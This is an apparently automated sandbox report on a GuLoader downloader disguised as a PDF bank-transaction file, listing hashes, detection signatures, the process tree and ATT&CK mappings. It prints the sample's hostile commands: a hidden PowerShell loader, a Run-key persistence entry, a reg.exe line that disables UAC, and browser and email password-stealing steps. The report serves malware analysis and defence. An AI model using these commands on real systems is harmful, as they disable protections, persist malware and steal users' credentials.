Analysis
max time kernel: 149s
max time network: 148s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 10-07-2024 08:38
Static task static1
Behavioral task behavioral1: sample pko_trans_details_20240710_105339·pdf.exe, resource win7-20240704-en
Behavioral task behavioral2: sample pko_trans_details_20240710_105339·pdf.exe, resource win10v2004-20240709-en
Behavioral task behavioral3: sample $PLUGINSDIR/BgImage.dll, resource win7-20240705-en
Behavioral task behavioral4: sample $PLUGINSDIR/BgImage.dll, resource win10v2004-20240709-en
Behavioral task behavioral5: sample $PLUGINSDIR/UserInfo.dll, resource win7-20240708-en
Behavioral task behavioral6: sample $PLUGINSDIR/UserInfo.dll, resource win10v2004-20240709-en
Behavioral task behavioral7: sample $PLUGINSDIR/nsDialogs.dll, resource win7-20240708-en
Behavioral task behavioral8: sample $PLUGINSDIR/nsDialogs.dll, resource win10v2004-20240709-en
General
Target: pko_trans_details_20240710_105339·pdf.exe
Size: 477KB
MD5: c601d5e720a191b1e304c8bcbf63b675
SHA1: 80133fe77b17d44886e6201d7723be90489a55d2
SHA256: d7325eb4553b2c58a8580cb84af63cfe5cdf4ff23a3d4e09a963c656d5717d8c
SHA512: 2a78f640f01f365d23bb45bfc96e6900eb1814804bbf905876ac9d6e9353fd3e648efc08858b9e29e41eb6c2262e528d34b00d847524aeeabf41eb319792566f
SSDEEP: 6144:39X0GFlllllllqllllllllllllhllllYllltlld0wz/ypzAJP8xvP2nWaLcAqRFk:R0Nwzy4EP2nWaPqzJgBKjYl92gCU3Bbl
Malware Config
Signatures

Guloader, Cloudeye
A shellcode based downloader first seen in 2020.

UAC bypass
Processes (description / ioc / process):
  Set value (int) / \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" / reg.exe

NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes (resource / yara_rule):
  behavioral1/memory/1764-73-0x0000000000400000-0x0000000000462000-memory.dmp / MailPassView

NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes (resource / yara_rule):
  behavioral1/memory/1140-74-0x0000000000400000-0x0000000000478000-memory.dmp / WebBrowserPassView

Nirsoft 3 IoCs
Processes (resource / yara_rule):
  behavioral1/memory/1140-74-0x0000000000400000-0x0000000000478000-memory.dmp / Nirsoft
  behavioral1/memory/1764-73-0x0000000000400000-0x0000000000462000-memory.dmp / Nirsoft
  behavioral1/memory/1728-76-0x0000000000400000-0x0000000000424000-memory.dmp / Nirsoft

Blocklisted process makes network request 10 IoCs
Processes (flow / pid / process):
  flows 5, 7, 9, 11, 13, 15, 16, 18, 19, 20 / 2856 / powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.

Loads dropped DLL 4 IoCs
Processes (pid / process):
  2812 / pko_trans_details_20240710_105339·pdf.exe (4 entries)

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes (description / ioc / process):
  Key opened / \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts / powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs
Processes (description / ioc / process):
  Set value (str) / \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows\CurrentVersion\Run\Preeffort = "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\\Jeglasset\\').Communicatory;%Begittede% ($Assiduity)" / reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes (pid / process):
  2856 / powershell.exe (2 entries)

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes (pid / process):
  2856 / powershell.exe

Suspicious use of SetThreadContext 3 IoCs
Processes (description / pid / process / target process):
  PID 2856 set thread context of 1140 / 2856 / powershell.exe / powershell.exe
  PID 2856 set thread context of 1764 / 2856 / powershell.exe / powershell.exe
  PID 2856 set thread context of 1728 / 2856 / powershell.exe / powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Modifies registry key 1 TTPs 2 IoCs

Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes (pid / process):
  2856 / powershell.exe (8 entries)
  1140 / powershell.exe (2 entries)

Suspicious behavior: MapViewOfSection 3 IoCs
Processes (pid / process):
  2856 / powershell.exe (3 entries)

Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes (description / pid / process):
  Token: SeDebugPrivilege / 2856 / powershell.exe
  Token: SeDebugPrivilege / 1728 / powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs
Processes (pid / process):
  2856 / powershell.exe

Suspicious use of WriteProcessMemory 35 IoCs
Processes (description / pid / process / target process):
  PID 2812 wrote to memory of 2856 / 2812 / pko_trans_details_20240710_105339·pdf.exe / powershell.exe (4 entries)
  PID 2856 wrote to memory of 2076 / 2856 / powershell.exe / cmd.exe (4 entries)
  PID 2076 wrote to memory of 264 / 2076 / cmd.exe / reg.exe (4 entries)
  PID 2856 wrote to memory of 2936 / 2856 / powershell.exe / cmd.exe (4 entries)
  PID 2936 wrote to memory of 596 / 2936 / cmd.exe / reg.exe (4 entries)
  PID 2856 wrote to memory of 1140 / 2856 / powershell.exe / powershell.exe (5 entries)
  PID 2856 wrote to memory of 1764 / 2856 / powershell.exe / powershell.exe (5 entries)
  PID 2856 wrote to memory of 1728 / 2856 / powershell.exe / powershell.exe (5 entries)
Processes

1. C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe (PID 2812)
   Command line: "C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"
   - Loads dropped DLL
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2856)
      Command line: "powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\SysWOW64\cmd.exe (PID 2076)
         Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\SysWOW64\reg.exe (PID 264)
            Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
            - Adds Run key to start application
            - Modifies registry key

      3. C:\Windows\SysWOW64\cmd.exe (PID 2936)
         Command line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\SysWOW64\reg.exe (PID 596)
            Command line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            - UAC bypass
            - Modifies registry key

      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1140)
         Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\ctbyqqvqppawzvpxqeskfzzfkufbvjjw"
         - Suspicious behavior: EnumeratesProcesses

      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1764)
         Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\mwpi"
         - Accesses Microsoft Outlook accounts

      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1728)
         Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\pqubsbqd"
         - Suspicious use of AdjustPrivilegeToken
Network

MITRE ATT&CK Enterprise v15
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
Downloads